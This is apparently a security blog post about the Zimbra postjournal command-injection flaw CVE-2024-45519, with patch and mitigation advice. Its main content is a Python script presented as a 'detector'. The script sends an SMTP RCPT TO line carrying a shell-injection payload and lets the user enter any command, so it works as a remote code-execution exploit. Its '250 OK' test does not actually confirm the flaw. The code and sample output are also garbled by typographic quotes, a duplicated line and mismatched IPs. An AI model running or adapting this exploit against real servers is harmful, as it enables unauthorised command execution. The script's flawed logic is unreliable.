9.8 Critical Severity
Protect Your Zimbra Servers: Detecting CVE-2024–45519
- import socket
- import sys
- import time
- def check_vulnerability(target_ip, target_port, payload):
- try:
- with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
- s.settimeout(10)
- s.connect((target_ip, target_port))
- print(f”[*] Connected to {target_ip}:{target_port}”)
- smtp_commands = [
- b’EHLO localhost\r\n’,
- b’MAIL FROM:<test@mail.com>\r\n’,
- f’RCPT TO:<”{payload}”@mail.com>\r\n’.encode(),
- b’DATA\r\nTest Message\r\n.\r\n’
- ]
- for command in smtp_commands:
- s.sendall(command)
- response = s.recv(1024)
- if not response:
- print(f”[-] No response received for command: {command.decode().strip()}”)
- return
- if b’250' in response:
- print(f”[+] Command executed: {command.decode().strip()} — Response: {response.decode().strip()}”)
- else:
- print(f”[-] Command failed: {command.decode().strip()} — Response: {response.decode().strip()}”)
- time.sleep(1)
- print(“[*] Vulnerability detection completed.”)
- except socket.timeout:
- print(f”[-] Connection to {target_ip}:{target_port} timed out.”)
- except socket.gaierror:
- print(f”[-] Invalid target IP address or hostname: {target_ip}”)
- except socket.error as err:
- print(f”[-] Network error occurred: {err}”)
- except Exception as e:
- print(f”[-] An unexpected error occurred: {e}”)def interactive_setup():
- def interactive_setup():
- try:
- target_ip = input(“Enter the target IP address: “).strip()
- target_port = input(“Enter the target port (default is 10027): “).strip()
- target_port = int(target_port) if target_port else 10027
- payload = input(‘Enter the payload (default is “aabbb$(touch /tmp/pwned)”): ‘).strip()
- if not payload:
- payload = ‘aabbb$(touch /tmp/pwned)’
- print(f”[*] Checking {target_ip}:{target_port} for vulnerability with payload ‘{payload}’”)
- check_vulnerability(target_ip, target_port, payload)
- except ValueError:
- print(“Invalid input. Please ensure the port is a number.”)
- except KeyboardInterrupt:
- print(“\nProcess interrupted by user.”)
- if __name__ == “__main__”:
- interactive_setup()
Description
Introduction
A newly discovered vulnerability in Synacor’s Zimbra Collaboration platform has been the focus of aggressive exploitation efforts, according to cybersecurity experts. Enterprise security company Proofpoint started to notice these attacks on September 28, 2024. They make use of CVE-2024–45519, a major vulnerability in Zimbra’s postjournal service. Affected installations might be vulnerable to arbitrary command execution by unauthenticated attackers due to this issue.
The goal of these attacks is to trick Zimbra servers into running malicious commands using the’sh’ tool by using bogus Gmail emails and commands encoded in Base64. Many systems are still vulnerable, even though Zimbra fixed the problem in recent patches (versions 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, and 10.1.1) that were issued on September 4, 2024.
Synacor has warned users to install the fix right away to stop exploitation, even if the postjournal functionality isn’t activated for most people. Removing the postjournal binary temporarily may reduce risk in situations when the fix cannot be deployed.
How it works?
Through SMTP directives that it exchanges with the Zimbra postjournal service, the Python script is able to identify the CVE-2024–45519 vulnerability. This is the procedure laid out in detail:
- The script establishes a connection by connecting to the target server via TCP using the IP and port you provide. The postjournal service in Zimbra usually uses port 10027; however, this may be changed if needed.
- Delivering customized SMTP instructions:
When the script establishes a connection, it sends out a string of typical SMTP instructions including ‘EHLO,’ ‘MAIL FROM,’ ‘RCPT TO,’ and ‘DATA.’ However, there’s a catch: the RCPT TO command includes a malicious payload. The payload’s goal is to get the server to run a shell command. As an example, the script’s default payload is: “command prompt to execute “aabbb$(touch /tmp/pwned)”@mail.com”
Upon detection of the vulnerability, this payload endeavors to create the file ‘/tmp/pwned’ on the server. - Examining the Reaction: The server provides a status code (such as “250 OK” for successful instructions) in response to every SMTP request. The server may be susceptible to command injection if the constructed RCPT TO command with the payload is received without problems. As an example, if the server uses appropriate input sanitization, it will succeed otherwise.
- Assessing Vulnerability: The script determines that the system may be susceptible to CVE-2024–45519 if the server returns a ‘250’ result, indicating that it has successfully processed the malicious payload. The server is probably not susceptible or has the vulnerability addressed if the payload is refused or if there is no response.
Here’s Why It Works:
It is possible for attackers to insert arbitrary instructions into SMTP requests due to the fact that Zimbra’s postjournal service does not adequately sanitize user input. An attacker may take control of the compromised server and execute instructions in the Zimbra user’s context by taking advantage of this input vulnerability. The script detects the presence of the vulnerability by non-intrusively mimicking this exploitation attempt.
How to use?
1. Make sure Python3 is installed.
2. Copy the script and save it as ‘detect.py’.
3. Start the Program: Get to the script’s storage location by opening the terminal or command prompt. At last, execute the script by typing the following command: “python3 detect.py."
4. Enter the Target Information:Python 3 To test a Zimbra server, the script will ask you for its target IP address. — After that, it will inquire about the destination port. To utilize the default port of 10027, hit Enter if you are not sure. — Lastly, input the payload, which is the malicious command that will be tested. To try to create a file named ‘/tmp/pwned' if it succeeds, the default is '"aabbb$(touch /tmp/pwned)"'.
5. Decipher the Findings: — The script will output:
- If the target system is vulnerable, the script will respond with:
[+] Command executed: RCPT TO:<"aabbb$(touch /tmp/pwned)"@mail.com> - Response: 250 OK
- This means the server accepted the malicious input, suggesting that it might be vulnerable.
- If the vulnerability is mitigated or the target is not vulnerable, you’ll see a response indicating the command failed or was rejected.
Example Usage:
$ python3 detect.py
Enter the target IP address: 192.168.1.01
Enter the target port (default is 10027)
Enter the payload (default is "aabbb$(touch /tmp/pwned)"): [] Checking 192.168.1.10:10027 for vulnerability with payload 'aabbb$(touch /tmp/pwned)' [] Connected to 192.168.1.01:10027
Command executed: RCPT TO:<"aabbb$(touch /tmp/pwned)"@mail.com> - Response: 250 OK [*] Vulnerability detection completed.Final Thoughts:
Unpatched computers are susceptible to the serious vulnerability CVE-2024–45519 in Zimbra’s postjournal service, which allows attackers to execute arbitrary instructions. It is critical to install system patches, deactivate unused services (such as postjournal), and limit access to trustworthy networks in light of the reported active exploitation.
Administrators may easily test their systems for this vulnerability using the accompanying Python script, which allows them to customize the payloads and analyze the exposure. The greatest way to protect yourself against this major vulnerability, however, is to take preventative measures like deploying updates and checking for vulnerabilities on a regular basis.
Reference
https://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html
https://blog.projectdiscovery.io/zimbra-remote-code-execution/https://www.helpnetsecurity.com/2024/10/02/cve-2024-45519-exploited/
